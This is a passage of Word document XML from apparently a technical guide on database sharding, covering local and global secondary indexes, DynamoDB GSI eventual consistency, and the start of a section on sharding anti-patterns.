    <w:p w14:paraId="76EB5A2E" w14:textId="77777777" w:rsidR="00875520" w:rsidRPr="00875520" w:rsidRDefault="00875520" w:rsidP="00875520">
      <w:r w:rsidRPr="00875520">
        <w:t>Sharded databases have two options for secondary indexes:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3DEF97F6" w14:textId="77777777" w:rsidR="00875520" w:rsidRPr="00875520" w:rsidRDefault="00875520" w:rsidP="00875520">
      <w:r w:rsidRPr="00875520">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>Local secondary indexes (per-shard):</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2BA59EF2" w14:textId="77777777" w:rsidR="00875520" w:rsidRPr="00875520" w:rsidRDefault="00875520" w:rsidP="00875520">
      <w:r w:rsidRPr="00875520">
        <w:t>Code</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0BCF76F2" w14:textId="77777777" w:rsidR="00875520" w:rsidRPr="00875520" w:rsidRDefault="00875520" w:rsidP="00875520">
      <w:r w:rsidRPr="00875520">
        <w:lastRenderedPageBreak/>
        <w:t>Each shard maintains its own index on email column</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3112CAE7" w14:textId="77777777" w:rsidR="00875520" w:rsidRPr="00875520" w:rsidRDefault="00875520" w:rsidP="00875520"/>
    <w:p w14:paraId="38FEC11B" w14:textId="77777777" w:rsidR="00875520" w:rsidRPr="00875520" w:rsidRDefault="00875520" w:rsidP="00875520">
      <w:r w:rsidRPr="00875520">
        <w:t>Query: SELECT * FROM users WHERE email = 'alice@example.com'</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="204303B3" w14:textId="77777777" w:rsidR="00875520" w:rsidRPr="00875520" w:rsidRDefault="00875520" w:rsidP="00875520">
      <w:r w:rsidRPr="00875520">
        <w:t>→ Must scatter to ALL shards (any shard could have Alice's row)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="45F1AA2A" w14:textId="77777777" w:rsidR="00875520" w:rsidRPr="00875520" w:rsidRDefault="00875520" w:rsidP="00875520">
      <w:r w:rsidRPr="00875520">
        <w:t>→ Each shard checks its local email index</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6319F9AD" w14:textId="77777777" w:rsidR="00875520" w:rsidRPr="00875520" w:rsidRDefault="00875520" w:rsidP="00875520">
      <w:r w:rsidRPr="00875520">
        <w:t>→ Coordinator merges results (0 or 1 matching row from the whole cluster)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="768C5BAE" w14:textId="77777777" w:rsidR="00875520" w:rsidRPr="00875520" w:rsidRDefault="00875520" w:rsidP="00875520"/>
    <w:p w14:paraId="01A60964" w14:textId="77777777" w:rsidR="00875520" w:rsidRPr="00875520" w:rsidRDefault="00875520" w:rsidP="00875520">
      <w:r w:rsidRPr="00875520">
        <w:t>Cost: N shard queries (always scatter-gather for non-shard-key predicates)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="59C2F973" w14:textId="77777777" w:rsidR="00875520" w:rsidRPr="00875520" w:rsidRDefault="00875520" w:rsidP="00875520">
      <w:r w:rsidRPr="00875520">
        <w:t>Benefit: no additional infrastructure, index maintained locally on each shard</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="27E88C7E" w14:textId="77777777" w:rsidR="00875520" w:rsidRPr="00875520" w:rsidRDefault="00875520" w:rsidP="00875520"/>
    <w:p w14:paraId="1F62894E" w14:textId="77777777" w:rsidR="00875520" w:rsidRPr="00875520" w:rsidRDefault="00875520" w:rsidP="00875520">
      <w:r w:rsidRPr="00875520">
        <w:t>When acceptable:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="223A2C69" w14:textId="77777777" w:rsidR="00875520" w:rsidRPr="00875520" w:rsidRDefault="00875520" w:rsidP="00875520">
      <w:r w:rsidRPr="00875520">
        <w:t xml:space="preserve">  Query is infrequent (administrative lookups, not hot path)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2CC67F07" w14:textId="77777777" w:rsidR="00875520" w:rsidRPr="00875520" w:rsidRDefault="00875520" w:rsidP="00875520">
      <w:r w:rsidRPr="00875520">
        <w:t xml:space="preserve">  N is small (4-10 shards, scatter-gather cost is manageable)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="560402F0" w14:textId="77777777" w:rsidR="00875520" w:rsidRPr="00875520" w:rsidRDefault="00875520" w:rsidP="00875520">
      <w:r w:rsidRPr="00875520">
        <w:t xml:space="preserve">  Query naturally returns small result set (lookup by email returns 0-1 rows)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="72F19165" w14:textId="77777777" w:rsidR="00875520" w:rsidRPr="00875520" w:rsidRDefault="00875520" w:rsidP="00875520">
      <w:r w:rsidRPr="00875520">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>Global secondary indexes (dedicated index shard):</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3863B239" w14:textId="77777777" w:rsidR="00875520" w:rsidRPr="00875520" w:rsidRDefault="00875520" w:rsidP="00875520">
      <w:r w:rsidRPr="00875520">
        <w:t>Code</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="63B90926" w14:textId="77777777" w:rsidR="00875520" w:rsidRPr="00875520" w:rsidRDefault="00875520" w:rsidP="00875520">
      <w:r w:rsidRPr="00875520">
        <w:t>Separate shard (or separate table) maintains: email → user_id mapping</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4CA0EBD8" w14:textId="77777777" w:rsidR="00875520" w:rsidRPr="00875520" w:rsidRDefault="00875520" w:rsidP="00875520">
      <w:r w:rsidRPr="00875520">
        <w:t>This shard is itself potentially sharded (by email hash)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="54848CAB" w14:textId="77777777" w:rsidR="00875520" w:rsidRPr="00875520" w:rsidRDefault="00875520" w:rsidP="00875520"/>
    <w:p w14:paraId="7C1555BB" w14:textId="77777777" w:rsidR="00875520" w:rsidRPr="00875520" w:rsidRDefault="00875520" w:rsidP="00875520">
      <w:r w:rsidRPr="00875520">
        <w:t>Query: SELECT * FROM users WHERE email = 'alice@example.com'</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5986F06D" w14:textId="77777777" w:rsidR="00875520" w:rsidRPr="00875520" w:rsidRDefault="00875520" w:rsidP="00875520">
      <w:r w:rsidRPr="00875520">
        <w:t xml:space="preserve">  Step 1: Route to email_index shard: GET user_id WHERE email = 'alice@example.com'</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="28C26B6D" w14:textId="77777777" w:rsidR="00875520" w:rsidRPr="00875520" w:rsidRDefault="00875520" w:rsidP="00875520">
      <w:r w:rsidRPr="00875520">
        <w:t xml:space="preserve">          Returns: user_id = 42</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="45A008AB" w14:textId="77777777" w:rsidR="00875520" w:rsidRPr="00875520" w:rsidRDefault="00875520" w:rsidP="00875520">
      <w:r w:rsidRPr="00875520">
        <w:t xml:space="preserve">  Step 2: Route to user shard: SELECT * FROM users WHERE user_id = 42</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="27795A52" w14:textId="77777777" w:rsidR="00875520" w:rsidRPr="00875520" w:rsidRDefault="00875520" w:rsidP="00875520">
      <w:r w:rsidRPr="00875520">
        <w:t xml:space="preserve">  </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="758AB93A" w14:textId="77777777" w:rsidR="00875520" w:rsidRPr="00875520" w:rsidRDefault="00875520" w:rsidP="00875520">
      <w:r w:rsidRPr="00875520">
        <w:t xml:space="preserve">  Total: 2 round trips (vs N scatter-gather round trips)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="65F0E42C" w14:textId="77777777" w:rsidR="00875520" w:rsidRPr="00875520" w:rsidRDefault="00875520" w:rsidP="00875520">
      <w:r w:rsidRPr="00875520">
        <w:t xml:space="preserve">  Cost: 2× latency, O(1) database work (vs O(N) scatter-gather work)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="656E60CC" w14:textId="77777777" w:rsidR="00875520" w:rsidRPr="00875520" w:rsidRDefault="00875520" w:rsidP="00875520">
      <w:r w:rsidRPr="00875520">
        <w:lastRenderedPageBreak/>
        <w:t xml:space="preserve">  </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="568452C4" w14:textId="77777777" w:rsidR="00875520" w:rsidRPr="00875520" w:rsidRDefault="00875520" w:rsidP="00875520">
      <w:r w:rsidRPr="00875520">
        <w:t>Maintenance:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2D680F2F" w14:textId="77777777" w:rsidR="00875520" w:rsidRPr="00875520" w:rsidRDefault="00875520" w:rsidP="00875520">
      <w:r w:rsidRPr="00875520">
        <w:t xml:space="preserve">  On user INSERT: also insert (email, user_id) into email_index shard</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0C1B39B8" w14:textId="77777777" w:rsidR="00875520" w:rsidRPr="00875520" w:rsidRDefault="00875520" w:rsidP="00875520">
      <w:r w:rsidRPr="00875520">
        <w:t xml:space="preserve">  On email UPDATE: delete old (email, user_id), insert new</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0B8211CD" w14:textId="77777777" w:rsidR="00875520" w:rsidRPr="00875520" w:rsidRDefault="00875520" w:rsidP="00875520">
      <w:r w:rsidRPr="00875520">
        <w:t xml:space="preserve">  This is a cross-shard write (users shard + email_index shard)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="17F1A3AA" w14:textId="77777777" w:rsidR="00875520" w:rsidRPr="00875520" w:rsidRDefault="00875520" w:rsidP="00875520">
      <w:r w:rsidRPr="00875520">
        <w:t xml:space="preserve">  Must be atomic: either both writes succeed or neither</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2C208175" w14:textId="77777777" w:rsidR="00875520" w:rsidRPr="00875520" w:rsidRDefault="00875520" w:rsidP="00875520">
      <w:r w:rsidRPr="00875520">
        <w:t xml:space="preserve">  Use Saga or 2PC for this dual write</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="76133107" w14:textId="77777777" w:rsidR="00875520" w:rsidRPr="00875520" w:rsidRDefault="00875520" w:rsidP="00875520">
      <w:r w:rsidRPr="00875520">
        <w:t xml:space="preserve">  </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="594CDD57" w14:textId="77777777" w:rsidR="00875520" w:rsidRPr="00875520" w:rsidRDefault="00875520" w:rsidP="00875520">
      <w:r w:rsidRPr="00875520">
        <w:t>Used by:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="74D43FEC" w14:textId="77777777" w:rsidR="00875520" w:rsidRPr="00875520" w:rsidRDefault="00875520" w:rsidP="00875520">
      <w:r w:rsidRPr="00875520">
        <w:t xml:space="preserve">  Cassandra: materialized views (global secondary indexes with async replication)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0DA54177" w14:textId="77777777" w:rsidR="00875520" w:rsidRPr="00875520" w:rsidRDefault="00875520" w:rsidP="00875520">
      <w:r w:rsidRPr="00875520">
        <w:t xml:space="preserve">  DynamoDB: Global Secondary Indexes (GSI) — eventually consistent cross-shard index</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="17CD281B" w14:textId="77777777" w:rsidR="00875520" w:rsidRPr="00875520" w:rsidRDefault="00875520" w:rsidP="00875520">
      <w:r w:rsidRPr="00875520">
        <w:t xml:space="preserve">  Vitess: lookup vindexes (explicitly managed secondary routing tables)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="34885E4A" w14:textId="77777777" w:rsidR="00875520" w:rsidRPr="00875520" w:rsidRDefault="00875520" w:rsidP="00875520">
      <w:r w:rsidRPr="00875520">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>DynamoDB Global Secondary Indexes:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6E96057C" w14:textId="77777777" w:rsidR="00875520" w:rsidRPr="00875520" w:rsidRDefault="00875520" w:rsidP="00875520">
      <w:r w:rsidRPr="00875520">
        <w:t>Code</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0C5D66A1" w14:textId="77777777" w:rsidR="00875520" w:rsidRPr="00875520" w:rsidRDefault="00875520" w:rsidP="00875520">
      <w:r w:rsidRPr="00875520">
        <w:t>Table: users (partition_key=user_id, sort_key=created_at)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7636D646" w14:textId="77777777" w:rsidR="00875520" w:rsidRPr="00875520" w:rsidRDefault="00875520" w:rsidP="00875520">
      <w:r w:rsidRPr="00875520">
        <w:t>GSI: users-by-email (partition_key=email, sort_key=created_at)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="30C72694" w14:textId="77777777" w:rsidR="00875520" w:rsidRPr="00875520" w:rsidRDefault="00875520" w:rsidP="00875520"/>
    <w:p w14:paraId="631FCC03" w14:textId="77777777" w:rsidR="00875520" w:rsidRPr="00875520" w:rsidRDefault="00875520" w:rsidP="00875520">
      <w:r w:rsidRPr="00875520">
        <w:t>GSI replication:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="55E27D88" w14:textId="77777777" w:rsidR="00875520" w:rsidRPr="00875520" w:rsidRDefault="00875520" w:rsidP="00875520">
      <w:r w:rsidRPr="00875520">
        <w:t xml:space="preserve">  DynamoDB automatically maintains the GSI</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6CF6C091" w14:textId="77777777" w:rsidR="00875520" w:rsidRPr="00875520" w:rsidRDefault="00875520" w:rsidP="00875520">
      <w:r w:rsidRPr="00875520">
        <w:t xml:space="preserve">  Every write to the base table → asynchronously propagated to GSI</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="514665AC" w14:textId="77777777" w:rsidR="00875520" w:rsidRPr="00875520" w:rsidRDefault="00875520" w:rsidP="00875520">
      <w:r w:rsidRPr="00875520">
        <w:t xml:space="preserve">  GSI is eventually consistent (not immediately consistent)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="14B76003" w14:textId="77777777" w:rsidR="00875520" w:rsidRPr="00875520" w:rsidRDefault="00875520" w:rsidP="00875520">
      <w:r w:rsidRPr="00875520">
        <w:t xml:space="preserve">  </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="59EB157A" w14:textId="77777777" w:rsidR="00875520" w:rsidRPr="00875520" w:rsidRDefault="00875520" w:rsidP="00875520">
      <w:r w:rsidRPr="00875520">
        <w:t>Query via GSI:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2AA3C09D" w14:textId="77777777" w:rsidR="00875520" w:rsidRPr="00875520" w:rsidRDefault="00875520" w:rsidP="00875520">
      <w:r w:rsidRPr="00875520">
        <w:t xml:space="preserve">  SELECT user_id, name FROM users WHERE email = 'alice@example.com'</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="672111F6" w14:textId="77777777" w:rsidR="00875520" w:rsidRPr="00875520" w:rsidRDefault="00875520" w:rsidP="00875520">
      <w:r w:rsidRPr="00875520">
        <w:t xml:space="preserve">  → Routed to GSI partition for alice@example.com</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7ABAFCC8" w14:textId="77777777" w:rsidR="00875520" w:rsidRPr="00875520" w:rsidRDefault="00875520" w:rsidP="00875520">
      <w:r w:rsidRPr="00875520">
        <w:t xml:space="preserve">  → O(1) lookup (no scatter-gather)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="72806C81" w14:textId="77777777" w:rsidR="00875520" w:rsidRPr="00875520" w:rsidRDefault="00875520" w:rsidP="00875520">
      <w:r w:rsidRPr="00875520">
        <w:lastRenderedPageBreak/>
        <w:t xml:space="preserve">  → GSI may be slightly behind base table (eventual consistency)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="43CF87C6" w14:textId="77777777" w:rsidR="00875520" w:rsidRPr="00875520" w:rsidRDefault="00875520" w:rsidP="00875520">
      <w:r w:rsidRPr="00875520">
        <w:t xml:space="preserve">  </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0B989AF6" w14:textId="77777777" w:rsidR="00875520" w:rsidRPr="00875520" w:rsidRDefault="00875520" w:rsidP="00875520">
      <w:r w:rsidRPr="00875520">
        <w:t>GSI consistency caveat:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="787D95A6" w14:textId="77777777" w:rsidR="00875520" w:rsidRPr="00875520" w:rsidRDefault="00875520" w:rsidP="00875520">
      <w:r w:rsidRPr="00875520">
        <w:t xml:space="preserve">  User updates email at T=0</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="04E2E9AF" w14:textId="77777777" w:rsidR="00875520" w:rsidRPr="00875520" w:rsidRDefault="00875520" w:rsidP="00875520">
      <w:r w:rsidRPr="00875520">
        <w:t xml:space="preserve">  User queries by old email at T=1ms → still found (GSI not yet updated)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="102B931A" w14:textId="77777777" w:rsidR="00875520" w:rsidRPr="00875520" w:rsidRDefault="00875520" w:rsidP="00875520">
      <w:r w:rsidRPr="00875520">
        <w:t xml:space="preserve">  User queries by new email at T=1ms → not found yet</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="72B70C95" w14:textId="77777777" w:rsidR="00875520" w:rsidRPr="00875520" w:rsidRDefault="00875520" w:rsidP="00875520">
      <w:r w:rsidRPr="00875520">
        <w:t xml:space="preserve">  Propagation delay: typically milliseconds, occasionally seconds under load</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="736A9C8C" w14:textId="77777777" w:rsidR="00875520" w:rsidRPr="00875520" w:rsidRDefault="00875520" w:rsidP="00875520">
      <w:r w:rsidRPr="00875520">
        <w:t xml:space="preserve">  </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5C04A0C4" w14:textId="77777777" w:rsidR="00875520" w:rsidRPr="00875520" w:rsidRDefault="00875520" w:rsidP="00875520">
      <w:r w:rsidRPr="00875520">
        <w:t xml:space="preserve">  Must tolerate GSI inconsistency or use consistent read from base table</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="38986D6C" w14:textId="77777777" w:rsidR="00875520" w:rsidRPr="00875520" w:rsidRDefault="00875520" w:rsidP="00875520">
      <w:r w:rsidRPr="00875520">
        <w:t xml:space="preserve">  (reads from base table are always consistent — reads from GSI are eventually consistent)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4AAAA97E" w14:textId="77777777" w:rsidR="00875520" w:rsidRPr="00875520" w:rsidRDefault="00875520" w:rsidP="00875520">
      <w:r w:rsidRPr="00875520">
        <w:pict w14:anchorId="2E45C38A">
          <v:rect id="_x0000_i5861" style="width:0;height:3pt" o:hralign="center" o:hrstd="t" o:hr="t" fillcolor="#a0a0a0" stroked="f"/>
        </w:pict>
      </w:r>
    </w:p>
    <w:p w14:paraId="103517C6" w14:textId="77777777" w:rsidR="00875520" w:rsidRPr="00875520" w:rsidRDefault="00875520" w:rsidP="00875520">
      <w:pPr>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00875520">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>8. Sharding Anti-Patterns</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5FDDC7F7" w14:textId="77777777" w:rsidR="00875520" w:rsidRPr="00875520" w:rsidRDefault="00875520" w:rsidP="00875520">
      <w:pPr>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00875520">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>Anti-Pattern 1: Premature Sharding</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5A4D420B" w14:textId="77777777" w:rsidR="00875520" w:rsidRPr="00875520" w:rsidRDefault="00875520" w:rsidP="00875520">
      <w:r w:rsidRPr="00875520">
        <w:t>Code</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="60EB8EBD" w14:textId="77777777" w:rsidR="00875520" w:rsidRPr="00875520" w:rsidRDefault="00875520" w:rsidP="00875520">
      <w:r w:rsidRPr="00875520">
        <w:t>The most common sharding mistake: sharding before it's necessary</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="47CFD455" w14:textId="77777777" w:rsidR="00875520" w:rsidRPr="00875520" w:rsidRDefault="00875520" w:rsidP="00875520"/>
    <w:p w14:paraId="0B119B65" w14:textId="77777777" w:rsidR="00875520" w:rsidRPr="00875520" w:rsidRDefault="00875520" w:rsidP="00875520">
      <w:r w:rsidRPr="00875520">
        <w:t>Costs of sharding:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3D83355A" w14:textId="77777777" w:rsidR="00875520" w:rsidRPr="00875520" w:rsidRDefault="00875520" w:rsidP="00875520">
      <w:r w:rsidRPr="00875520">
        <w:t xml:space="preserve">  - Cross-shard queries become complex (scatter-gather or denormalization)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6DA2985B" w14:textId="77777777" w:rsidR="00875520" w:rsidRPr="00875520" w:rsidRDefault="00875520" w:rsidP="00875520">
      <w:r w:rsidRPr="00875520">
        <w:t xml:space="preserve">  - Transactions become distributed (2PC complexity or saga patterns)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="11BBD306" w14:textId="77777777" w:rsidR="00875520" w:rsidRPr="00875520" w:rsidRDefault="00875520" w:rsidP="00875520">
      <w:r w:rsidRPr="00875520">
        <w:t xml:space="preserve">  - Operational overhead (rebalancing, multiple database instances to monitor)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6D9B394F" w14:textId="77777777" w:rsidR="00875520" w:rsidRPr="00875520" w:rsidRDefault="00875520" w:rsidP="00875520">
      <w:r w:rsidRPr="00875520">
        <w:t xml:space="preserve">  - Development complexity (routing logic, testing across shards)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="76F28B60" w14:textId="77777777" w:rsidR="00875520" w:rsidRPr="00875520" w:rsidRDefault="00875520" w:rsidP="00875520">
      <w:r w:rsidRPr="00875520">
        <w:t xml:space="preserve">  - Schema changes must be applied to all shards (DDL coordination)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="51D9CF7F" w14:textId="77777777" w:rsidR="00875520" w:rsidRPr="00875520" w:rsidRDefault="00875520" w:rsidP="00875520">
      <w:r w:rsidRPr="00875520">
        <w:t xml:space="preserve">  </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2BFA0B16" w14:textId="77777777" w:rsidR="00875520" w:rsidRPr="00875520" w:rsidRDefault="00875520" w:rsidP="00875520">
      <w:r w:rsidRPr="00875520">
        <w:t>When NOT to shard:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="32881D90" w14:textId="77777777" w:rsidR="00875520" w:rsidRPr="00875520" w:rsidRDefault="00875520" w:rsidP="00875520">
      <w:r w:rsidRPr="00875520">
        <w:t xml:space="preserve">  - Single database handles current load with &lt; 60% CPU/memory/storage</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2AE2FD99" w14:textId="77777777" w:rsidR="00875520" w:rsidRPr="00875520" w:rsidRDefault="00875520" w:rsidP="00875520">
      <w:r w:rsidRPr="00875520">
        <w:t xml:space="preserve">  - No projections suggesting single-machine limits within 12-18 months</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="612799B7" w14:textId="77777777" w:rsidR="00875520" w:rsidRPr="00875520" w:rsidRDefault="00875520" w:rsidP="00875520">
      <w:r w:rsidRPr="00875520">
        <w:lastRenderedPageBreak/>
        <w:t xml:space="preserve">  - Query patterns don't align with a natural shard key</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4740F818" w14:textId="77777777" w:rsidR="00875520" w:rsidRPr="00875520" w:rsidRDefault="00875520" w:rsidP="00875520">
      <w:r w:rsidRPr="00875520">
        <w:t xml:space="preserve">  - Team lacks distributed systems operational expertise</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="227A78CD" w14:textId="77777777" w:rsidR="00875520" w:rsidRPr="00875520" w:rsidRDefault="00875520" w:rsidP="00875520">
      <w:r w:rsidRPr="00875520">
        <w:t xml:space="preserve">  </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4F792045" w14:textId="77777777" w:rsidR="00875520" w:rsidRPr="00875520" w:rsidRDefault="00875520" w:rsidP="00875520">
      <w:r w:rsidRPr="00875520">
        <w:t>Instead: exhaust these options first</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="74D7E210" w14:textId="77777777" w:rsidR="00875520" w:rsidRPr="00875520" w:rsidRDefault="00875520" w:rsidP="00875520">
      <w:r w:rsidRPr="00875520">
        <w:t xml:space="preserve">  - Read replicas for read scaling</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="19086857" w14:textId="77777777" w:rsidR="00875520" w:rsidRPr="00875520" w:rsidRDefault="00875520" w:rsidP="00875520">
      <w:r w:rsidRPr="00875520">
        <w:t xml:space="preserve">  - Caching for hot-data read scaling</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="72979410" w14:textId="77777777" w:rsidR="00875520" w:rsidRPr="00875520" w:rsidRDefault="00875520" w:rsidP="00875520">
      <w:r w:rsidRPr="00875520">
        <w:t xml:space="preserve">  - Vertical scaling (larger machine)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3C182E70" w14:textId="77777777" w:rsidR="00875520" w:rsidRPr="00875520" w:rsidRDefault="00875520" w:rsidP="00875520">
      <w:r w:rsidRPr="00875520">
        <w:t xml:space="preserve">  - Archiving old data (reduce active dataset size)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="06BA45A6" w14:textId="77777777" w:rsidR="00875520" w:rsidRPr="00875520" w:rsidRDefault="00875520" w:rsidP="00875520">
      <w:r w:rsidRPr="00875520">
        <w:t xml:space="preserve">  - Denormalization (reduce join complexity, increase single-query efficiency)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="330EA54E" w14:textId="77777777" w:rsidR="00875520" w:rsidRPr="00875520" w:rsidRDefault="00875520" w:rsidP="00875520">
      <w:r w:rsidRPr="00875520">
        <w:t xml:space="preserve">  - Table partitioning (same machine, different physical files — often sufficient)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="53E87D6C" w14:textId="77777777" w:rsidR="00875520" w:rsidRPr="00875520" w:rsidRDefault="00875520" w:rsidP="00875520">
      <w:pPr>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00875520">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>Anti-Pattern 2: Bad Shard Key Choice</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="19207B24" w14:textId="77777777" w:rsidR="00875520" w:rsidRPr="00875520" w:rsidRDefault="00875520" w:rsidP="00875520">
      <w:r w:rsidRPr="00875520">
        <w:t>Code</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0E20E4EE" w14:textId="77777777" w:rsidR="00875520" w:rsidRPr="00875520" w:rsidRDefault="00875520" w:rsidP="00875520">
      <w:r w:rsidRPr="00875520">
        <w:t>Anti-pattern: shard by low-cardinality column</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1EFB3190" w14:textId="77777777" w:rsidR="00875520" w:rsidRPr="00875520" w:rsidRDefault="00875520" w:rsidP="00875520"/>
    <w:p w14:paraId="25A93682" w14:textId="77777777" w:rsidR="00875520" w:rsidRPr="00875520" w:rsidRDefault="00875520" w:rsidP="00875520">
      <w:r w:rsidRPr="00875520">
        <w:t>Table: orders, shard key: status (values: pending, processing, shipped, completed)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="679CE0DB" w14:textId="77777777" w:rsidR="00875520" w:rsidRPr="00875520" w:rsidRDefault="00875520" w:rsidP="00875520">
      <w:r w:rsidRPr="00875520">
        <w:t xml:space="preserve">  Shard 1: pending orders</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="086B2447" w14:textId="77777777" w:rsidR="00875520" w:rsidRPr="00875520" w:rsidRDefault="00875520" w:rsidP="00875520">
      <w:r w:rsidRPr="00875520">
        <w:t xml:space="preserve">  Shard 2: processing orders</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="115B6ECB" w14:textId="77777777" w:rsidR="00875520" w:rsidRPr="00875520" w:rsidRDefault="00875520" w:rsidP="00875520">
      <w:r w:rsidRPr="00875520">
        <w:t xml:space="preserve">  Shard 3: shipped orders</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7BB621A8" w14:textId="77777777" w:rsidR="00875520" w:rsidRPr="00875520" w:rsidRDefault="00875520" w:rsidP="00875520">
      <w:r w:rsidRPr="00875520">
        <w:t xml:space="preserve">  Shard 4: completed orders</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="153627EA" w14:textId="77777777" w:rsidR="00875520" w:rsidRPr="00875520" w:rsidRDefault="00875520" w:rsidP="00875520">
      <w:r w:rsidRPr="00875520">
        <w:t xml:space="preserve">  </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="59A5F57A" w14:textId="77777777" w:rsidR="00875520" w:rsidRPr="00875520" w:rsidRDefault="00875520" w:rsidP="00875520">
      <w:r w:rsidRPr="00875520">
        <w:t>Problems:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4EC72F5F" w14:textId="77777777" w:rsidR="00875520" w:rsidRPr="00875520" w:rsidRDefault="00875520" w:rsidP="00875520">
      <w:r w:rsidRPr="00875520">
        <w:t xml:space="preserve">  1. Cardinality: only 4 distinct values → can never add a 5th shard</w:t>
